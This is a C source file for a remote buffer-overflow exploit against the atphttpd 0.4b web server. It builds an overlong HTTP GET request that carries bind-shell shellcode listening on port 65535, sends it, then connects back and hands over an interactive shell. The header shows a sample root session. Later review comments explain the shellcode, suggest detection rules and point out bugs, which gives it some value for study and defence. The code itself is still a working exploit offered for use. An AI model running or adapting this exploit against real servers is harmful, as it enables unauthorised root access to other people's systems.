
  1. /******************************* 0-day ;]****************************************\
  2. **********************************************************************************
  3. ** Remote atphttpd <= 0.4b linux exploit by r-code d_fence@gmx.net              **
  4. **                                                                              **
  5. ** The exploit was successfully tested against Debian 3.0 (Woody)               **
  6. ** and Red Hat 8.0 (Psyche) (both) with atphttpd 0.4b (latest)                  **
  7. ** installed from source..                                                      **
  8. **                                                                              **
  9. ** The exploit gains the privileges of the user who runs atphttpd               **
  10. ** which is usually root.. the offsets may vary even for the same               **
  11. ** distros.. (e.g. on two different woody`s with the same athttpd               **
  12. ** installed on I got two different offsets working 1300 and 2400), so you      **
  13. ** you might have to play with them...                                          **
  14. **                                                                              **
  15. ** example:                                                                    **
  16. **                                                                              **
  17. ** bash~$ ./athttpd localhost 2400                                              **
  18. **                                                                              **
  19. **(<->) Atphttpd <= 0.4b remote exploit by r-code d_fence@gmx.net               **
  20. **(<->) Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher          **
  21. **                                                                              **
  22. ** <==> OFFSET: 0x8fc                                                           **
  23. ** <==> RET_ADDR: 0xbffff6fe                                                    **
  24. ** <==> Connecting to 'localhost' on port '80'..                                **
  25. ** <==> Sending packets..                                                       OO
  26. **                                                                              **
  27. ** ### Exploit failed ... just kidding ;]                                       **
  28. ** ### Exploit successful - enjoy your shell                                    **
  29. **                                                                              **
  30. ** uid=0(root) gid=0(root) groups=0(root)                                       **
  31. **  23:25:51 up  3:21,  1 user,  load average: 0.44, 0.41, 0.42                 **
  32. **  USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT       **
  33. **  root     tty1     -                20:05    3:19m  2.32s  2.22s  -bash      **
  34. **  Linux coredump 2.4.20 #1 czw sie 7 22:04:49 UTC 2003 i686 unknown           **
  35. ** /atphttpd-0.4b                                                               **
  36. **readline: warning: rl_prep_terminal: cannot get terminal settingsbash-2.05a#  **
  37. **********************************************************************************
  38. **********************************************************************************/ 
  39.  
  40.  
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* strlen()/memcpy()/memset(): used below but never declared before */
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/select.h>  /* select(), fd_set, FD_* */
#include <sys/socket.h>
#include <sys/types.h>
  48.  
/* Bind shellcode (port 65535) by Ramon de Carvalho Valle  */

/*
 * 72 bytes of i386 Linux machine code kept as a C string; main() copies it
 * into the middle of the request. Going by the per-byte disassembly: a run
 * of socketcall (0x66) invocations sets up the listening socket, the
 * dup2 (0x3f) loop attaches the accepted connection to fds 2..0, and
 * execve (0x0b) runs "/bin//sh". For defenders the byte sequence, not the
 * surrounding request, is the stable thing to match on.
 */
char shellcode[]= /*  72 bytes                          */
    "\x31\xdb"              /*  xorl    %ebx,%ebx                 */
    "\xf7\xe3"              /*  mull    %ebx                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x43"                  /*  incl    %ebx                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x6a\x02"              /*  pushl   $0x02                     */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\xb0\x66"              /*  movb    $0x66,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    "\xff\x49\x02"          /*  decl    0x02(%ecx)                */
    "\x6a\x10"              /*  pushl   $0x10                     */
    "\x51"                  /*  pushl   %ecx                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\x43"                  /*  incl    %ebx                      */
    "\xb0\x66"              /*  movb    $0x66,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    "\x89\x41\x04"          /*  movl    %eax,0x04(%ecx)           */
    "\xb3\x04"              /*  movb    $0x04,%bl                 */
    "\xb0\x66"              /*  movb    $0x66,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    "\x43"                  /*  incl    %ebx                      */
    "\xb0\x66"              /*  movb    $0x66,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    "\x59"                  /*  popl    %ecx                      */
    "\x93"                  /*  xchgl   %eax,%ebx                 */
    "\xb0\x3f"              /*  movb    $0x3f,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
    "\x49"                  /*  decl    %ecx                      */
    "\x79\xf9"              /*  jns     <bindsocketshellcode+45>  */
    "\x68\x2f\x2f\x73\x68"  /*  pushl   $0x68732f2f               */
    "\x68\x2f\x62\x69\x6e"  /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\xb0\x0b"              /*  movb    $0x0b,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */;
  90.  
#define LEN 820                     /* Size of the request buffer built and sent by main() */
#define DEFAULT_OFFSET 2400         /* Offsets might be between 1000-3000 , you can try in 100 steps*/
#define PORT 80                     /* Default port */
#define ALIGN 1                     /* Index shift applied when main() writes the address bytes */
  95.     
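/*
 * Resolve `hs` and open a TCP connection to it on `port`.
 *
 * Returns the connected socket descriptor, or -1 after reporting the failing
 * step on stderr. All failure paths now return -1 (the original exit(1)'d on
 * resolution failure while returning -1 elsewhere, and leaked the socket when
 * connect() failed).
 */
int connect_to_host(char *hs, int port)
{
    /* gethostbyname() does not set errno, so perror() would print an
     * unrelated message here; report the host name instead. */
    struct hostent *host = gethostbyname(hs);
    if (host == NULL) {
        fprintf(stderr, "gethostbyname(): while resolving host %s\n", hs);
        return -1;
    }

    struct sockaddr_in addr = { 0 };   /* zero the padding instead of leaving it uninitialised */
    addr.sin_family = AF_INET;
    addr.sin_port = htons((uint16_t)port);

    /* h_length comes from the resolver; bound the copy by the destination so a
     * non-IPv4 answer cannot overrun sin_addr. */
    size_t alen = (size_t)host->h_length;
    if (alen > sizeof addr.sin_addr)
        alen = sizeof addr.sin_addr;
    memcpy(&addr.sin_addr, host->h_addr_list[0], alen);

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket() error");
        return -1;
    }

    if (connect(sock, (struct sockaddr *)&addr, sizeof addr) < 0) {
        perror("connect() error");
        close(sock);                   /* the original leaked the descriptor on this path */
        return -1;
    }

    return sock;
}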
  124.  
  125.  
  126.  
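/*
 * Relay bytes between the connected socket `sd` and the terminal.
 *
 * Sends `cmd` once, then multiplexes the socket and stdin with select():
 * socket data is echoed to stdout, stdin data is written to the socket. The
 * loop only ends via exit(1) when the socket side hits EOF or an error (as
 * in the original); the function never returns normally.
 */
void shell(int sd)
{
    char cmd[] = "id; w; uname -a; pwd;export TERM=vt100; exec /bin/bash -i\n";
    char buf[2048];
    fd_set fds;

    memset(buf, 0, sizeof buf);
    send(sd, cmd, strlen(cmd), 0);

    for (;;) {
        fflush(stdout);
        FD_ZERO(&fds);
        FD_SET(sd, &fds);
        FD_SET(STDIN_FILENO, &fds);

        /* The original ignored select()'s result and went on to read from a
         * set that had not been updated; retry on a signal, fail otherwise. */
        if (select(sd + 1, &fds, NULL, NULL, NULL) < 0) {
            if (errno == EINTR)
                continue;
            perror("select()");
            exit(1);
        }

        if (FD_ISSET(sd, &fds)) {
            /* sizeof buf - 1 keeps room for the terminator: the original read
             * 2048 bytes and then stored buf[2048], one past the array. */
            ssize_t got = read(sd, buf, sizeof buf - 1);
            if (got <= 0)
                exit(1);
            buf[got] = '\0';
            fputs(buf, stdout);
        }

        if (FD_ISSET(STDIN_FILENO, &fds)) {
            ssize_t got = read(STDIN_FILENO, buf, sizeof buf - 1);
            if (got > 0) {
                buf[got] = '\0';
                /* Result deliberately unchecked, as before: a dead peer is
                 * noticed by the next read(sd, ...) returning <= 0. */
                (void)write(sd, buf, (size_t)got);
            }
        }
    }
}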
  162.  
  163.  
  164.  
  165.  
/*
 * Entry point. argv[1] is the target host; optional argv[2] replaces
 * DEFAULT_OFFSET. Builds one LEN-byte GET request line, sends it to PORT,
 * then treats a successful connect to port 65535 as the sign that the bind
 * shellcode is listening and hands that socket to shell().
 *
 * Returns -1 on usage, send or second-connect failure and 1 otherwise; a
 * failed first connect calls exit(1).
 */
int main(int argc,char **argv) {
    int i,sd;
    char http_req[LEN];
    unsigned long int ret=0,offset=DEFAULT_OFFSET;


    printf("(<->) Atphttpd <= 0.4b remote exploit by r-code d_fence@gmx.net\n");
    printf("(<->) Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher\n\n");


    if(argc<2 || argc>3){
        printf("[-] Usage: %s [host] <offset> #OFFset\n",argv[0]);
        return -1;
    }


    /* NOTE(review): atoi() reports nothing on malformed input, so a typo
     * silently becomes offset 0; strtoul() with an end-pointer check would
     * reject it. */
    if(argc>2)
        offset=atoi(argv[2]);

    /* Guessed return address: a fixed distance below the classic i386 Linux
     * stack top. This relies on a non-randomised, executable stack, which is
     * why ASLR and a non-executable stack defeat this technique. */
    ret=0xbffffffa - offset;

    /* NOTE(review): %x expects unsigned int but both arguments are unsigned
     * long — a format/argument mismatch (undefined behaviour); %lx is the
     * matching conversion. */
    printf("<==> OFFSET: 0x%x\n",offset);
    printf("<==> RET_ADDR: 0x%x\n",ret);


    /* See comment few lines below ;] */

    /* Request-line prefix "GET /" written one byte at a time. */
    http_req[0x00]='G';
    http_req[0x01]='E';
    http_req[0x02]='T';
    http_req[0x03]=' ';
    http_req[0x04]='/';

    /* Repeat the return address, low byte first, from index ALIGN+5 onward.
     * NOTE(review): the loop bound checks i before the four writes, not
     * after — with ALIGN == 1 the last pass (i == 817) stores into
     * http_req[818..821], and 820/821 are past the LEN-byte array. */
     for(i=0x05;i<LEN;) {
         http_req[ALIGN + i++] = (ret & 0x000000ff);
         http_req[ALIGN + i++] = (ret & 0x0000ff00) >> 8;
         http_req[ALIGN + i++] = (ret & 0x00ff0000) >> 16;
         http_req[ALIGN + i++] = (ret & 0xff000000) >> 24;
     }


    /* The first half of the URI is overwritten with 0x41 ('A'); the
     * shellcode is then centred on LEN/2, straddling filler and addresses. */
     for(i=0x05;i<(LEN/2);i++)
         http_req[i]=0x41;          /* Using jump-next instruction instead of nops for a better look ;] */

         /* NOTE(review): strlen(shellcode) is recomputed every iteration and
          * compared against a signed int; a size_t bound hoisted out of the
          * loop avoids both. */
         for(i=0;i<strlen(shellcode);i++)
             http_req[(LEN/2)-(strlen(shellcode)/2)+i]=shellcode[i];


    /* Trailer " HTTP/1.1\r\n" plus a NUL so the buffer is also a C string.
     * Detection angle: the request line is roughly 800 bytes made of one
     * repeated 4-byte value and a long run of 'A' — a request-URI length
     * limit or a pattern rule on the front end catches this shape. */
    http_req[LEN-0x0c]=' ';
    http_req[LEN-0x0b]='H';
    http_req[LEN-0x0a]='T';
    http_req[LEN-0x09]='T';
    http_req[LEN-0x08]='P';
    http_req[LEN-0x07]='/';
    http_req[LEN-0x06]='1';
    http_req[LEN-0x05]='.';
    http_req[LEN-0x04]='1';
    http_req[LEN-0x03]=0x0d;
    http_req[LEN-0x02]=0x0a;
    http_req[LEN-0x01]=0x00;

    /* Yeah.. I know I just could strcpy/cat it ;].. but so it looks soooooo l33t ;] aint`t it ? ;) */

    printf("<==> Connecting to '%s' on port '%d'..\n",argv[1],PORT);

    if((sd=connect_to_host(argv[1],PORT))<0) {
        printf("<==> Couldn`t connect to host.. :-/\n");
        exit(1);
    }

    printf("<==> Sending packets..\n");


    /* All LEN bytes go out, including the trailing NUL at LEN-1. */
    if(send(sd,http_req,LEN,0)<0) {
        perror("<==> send(): while sending evil http request");
        return -1;
    }

    close(sd);

    /* The bind shellcode listens on 65535, so this connect is the only
     * success test: a wrong offset and a merely crashed server look alike. */
    if((sd=connect_to_host(argv[1],65535))<0) {
        printf("<==> Exploit failed..! #Probably due to a bad offset\n");
        return -1;
    }


    printf("\n### Exploit failed ");
    fflush(stdout);
    sleep(1);
    printf("... just kidding ;]\n");
    sleep(1);
    printf("### Exploit successful - enjoy your shell\n\n");
    shell(sd);

    return 1;
}
  262.  
  263.  
  264.  
  265.  
  266.